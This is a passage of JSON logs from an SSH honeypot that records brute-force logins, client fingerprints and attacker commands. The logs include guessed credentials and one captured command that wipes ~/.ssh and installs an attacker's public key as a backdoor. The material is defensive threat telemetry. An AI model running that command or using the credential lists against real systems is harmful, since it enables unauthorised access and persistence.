{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T01:08:40.036605Z","src_ip":"212.227.125.160","session":"c6e16dd23e23"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:08:40.076778Z","src_ip":"212.227.235.229","session":"c523fa726d11"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T01:08:40.711869Z","src_ip":"212.227.235.229","session":"c523fa726d11"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-31T01:08:40.712543Z","src_ip":"212.227.235.229","session":"c523fa726d11"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-31T01:08:40.715204Z","src_ip":"212.227.235.229","session":"f85e3a6415e8"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.7","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:08:40.716022Z","src_ip":"212.227.235.229","session":"f85e3a6415e8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33018,"dst_ip":"1.2.3.4","dst_port":22,"session":"3aed08645978","protocol":"ssh","message":"New connection: 212.227.235.229:33018 (1.2.3.4:22) [session: 3aed08645978]","sensor":"my-vps","timestamp":"2025-08-31T01:08:40.717432Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T01:08:40.718355Z","src_ip":"212.227.235.229","session":"3aed08645978"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-31T01:08:40.781588Z","src_ip":"212.227.235.229","session":"c523fa726d11"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:08:40.782485Z","src_ip":"212.227.235.229","session":"c523fa726d11"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60634,"dst_ip":"1.2.3.4","dst_port":22,"session":"cad4f8d0956b","protocol":"ssh","message":"New connection: 212.227.235.229:60634 (1.2.3.4:22) [session: cad4f8d0956b]","sensor":"my-vps","timestamp":"2025-08-31T01:08:40.846181Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T01:08:40.847311Z","src_ip":"212.227.235.229","session":"cad4f8d0956b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T01:08:40.914469Z","src_ip":"212.227.235.229","session":"cad4f8d0956b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T01:08:40.957752Z","src_ip":"212.227.235.229","session":"3aed08645978"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-31T01:08:41.223050Z","src_ip":"212.227.235.229","session":"cad4f8d0956b"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-31T01:08:41.923432Z","src_ip":"212.227.235.229","session":"3aed08645978"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:08:42.290986Z","src_ip":"212.227.235.229","session":"cad4f8d0956b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33100,"dst_ip":"1.2.3.4","dst_port":22,"session":"ccf0ac8dff99","protocol":"ssh","message":"New connection: 212.227.235.229:33100 (1.2.3.4:22) [session: ccf0ac8dff99]","sensor":"my-vps","timestamp":"2025-08-31T01:08:42.358275Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T01:08:42.359242Z","src_ip":"212.227.235.229","session":"ccf0ac8dff99"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T01:08:42.427142Z","src_ip":"212.227.235.229","session":"ccf0ac8dff99"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-31T01:08:42.743207Z","src_ip":"212.227.235.229","session":"ccf0ac8dff99"}
{"eventid":"cowrie.session.closed","duration":"3.3","message":"Connection lost after 3.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:08:42.812284Z","src_ip":"212.227.235.229","session":"c523fa726d11"}
{"eventid":"cowrie.session.closed","duration":"0.5","message":"Connection lost after 0.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:08:42.813820Z","src_ip":"212.227.235.229","session":"ccf0ac8dff99"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:08:43.168722Z","src_ip":"212.227.235.229","session":"3aed08645978"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34284,"dst_ip":"1.2.3.4","dst_port":22,"session":"55b4134b7456","protocol":"ssh","message":"New connection: 212.227.235.229:34284 (1.2.3.4:22) [session: 55b4134b7456]","sensor":"my-vps","timestamp":"2025-08-31T01:08:43.392357Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T01:08:43.400774Z","src_ip":"212.227.235.229","session":"55b4134b7456"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T01:08:43.631187Z","src_ip":"212.227.235.229","session":"55b4134b7456"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-31T01:08:44.567241Z","src_ip":"212.227.235.229","session":"55b4134b7456"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:08:44.801546Z","src_ip":"212.227.235.229","session":"55b4134b7456"}
{"eventid":"cowrie.session.closed","duration":"7.3","message":"Connection lost after 7.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:08:44.804766Z","src_ip":"212.227.235.229","session":"f85e3a6415e8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":35643,"dst_ip":"1.2.3.4","dst_port":22,"session":"c8aeef45ca3b","protocol":"ssh","message":"New connection: 212.227.125.160:35643 (1.2.3.4:22) [session: c8aeef45ca3b]","sensor":"my-vps","timestamp":"2025-08-31T01:08:45.186229Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-31T01:08:45.187282Z","src_ip":"212.227.125.160","session":"c8aeef45ca3b"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-31T01:08:45.267366Z","src_ip":"212.227.125.160","session":"c8aeef45ca3b"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"oracle","message":"login attempt [oracle/oracle] failed","sensor":"my-vps","timestamp":"2025-08-31T01:08:45.682328Z","src_ip":"212.227.125.160","session":"c8aeef45ca3b"}
{"eventid":"cowrie.login.success","username":"root","password":"suporte01","message":"login attempt [root/suporte01] succeeded","sensor":"my-vps","timestamp":"2025-08-31T01:08:46.511391Z","src_ip":"212.227.125.160","session":"c6e16dd23e23"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"abc123","message":"login attempt [oracle/abc123] failed","sensor":"my-vps","timestamp":"2025-08-31T01:08:46.764972Z","src_ip":"212.227.125.160","session":"c8aeef45ca3b"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"abcd123","message":"login attempt [oracle/abcd123] failed","sensor":"my-vps","timestamp":"2025-08-31T01:08:47.847495Z","src_ip":"212.227.125.160","session":"c8aeef45ca3b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":40764,"dst_ip":"1.2.3.4","dst_port":22,"session":"b3a095f2f4c6","protocol":"ssh","message":"New connection: 212.227.125.160:40764 (1.2.3.4:22) [session: b3a095f2f4c6]","sensor":"my-vps","timestamp":"2025-08-31T01:08:48.680334Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T01:08:48.689061Z","src_ip":"212.227.125.160","session":"b3a095f2f4c6"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T01:08:48.754585Z","src_ip":"212.227.125.160","session":"b3a095f2f4c6"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"abcd1234","message":"login attempt [oracle/abcd1234] failed","sensor":"my-vps","timestamp":"2025-08-31T01:08:48.928511Z","src_ip":"212.227.125.160","session":"c8aeef45ca3b"}
{"eventid":"cowrie.login.failed","username":"dev","password":"123456","message":"login attempt [dev/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T01:08:49.095754Z","src_ip":"212.227.125.160","session":"b3a095f2f4c6"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"abc1234","message":"login attempt [oracle/abc1234] failed","sensor":"my-vps","timestamp":"2025-08-31T01:08:50.011499Z","src_ip":"212.227.125.160","session":"c8aeef45ca3b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T01:08:50.179167Z","src_ip":"212.227.125.160","session":"c6e16dd23e23"}
{"eventid":"cowrie.command.input","input":"uname -a","message":"CMD: uname -a","sensor":"my-vps","timestamp":"2025-08-31T01:08:50.179906Z","src_ip":"212.227.125.160","session":"c6e16dd23e23"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:08:50.228837Z","src_ip":"212.227.125.160","session":"b3a095f2f4c6"}
{"eventid":"cowrie.session.closed","duration":"5.9","message":"Connection lost after 5.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:08:51.093282Z","src_ip":"212.227.125.160","session":"c8aeef45ca3b"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15","size":80,"shasum":"28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15","duplicate":true,"duration":"1.6","message":"Closing TTY Log: var/lib/cowrie/tty/28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15 after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:08:51.731489Z","src_ip":"212.227.125.160","session":"c6e16dd23e23"}
{"eventid":"cowrie.session.closed","duration":"13.1","message":"Connection lost after 13.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:08:51.732635Z","src_ip":"212.227.125.160","session":"c6e16dd23e23"}
{"eventid":"cowrie.session.connect","src_ip":"201.148.180.50","src_port":49250,"dst_ip":"1.2.3.4","dst_port":22,"session":"9eb750f2c401","protocol":"ssh","message":"New connection: 201.148.180.50:49250 (1.2.3.4:22) [session: 9eb750f2c401]","sensor":"my-vps","timestamp":"2025-08-31T01:08:58.130157Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":49488,"dst_ip":"1.2.3.4","dst_port":22,"session":"960997d9d3c8","protocol":"ssh","message":"New connection: 212.227.125.160:49488 (1.2.3.4:22) [session: 960997d9d3c8]","sensor":"my-vps","timestamp":"2025-08-31T01:08:59.195161Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T01:08:59.195899Z","src_ip":"212.227.125.160","session":"960997d9d3c8"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 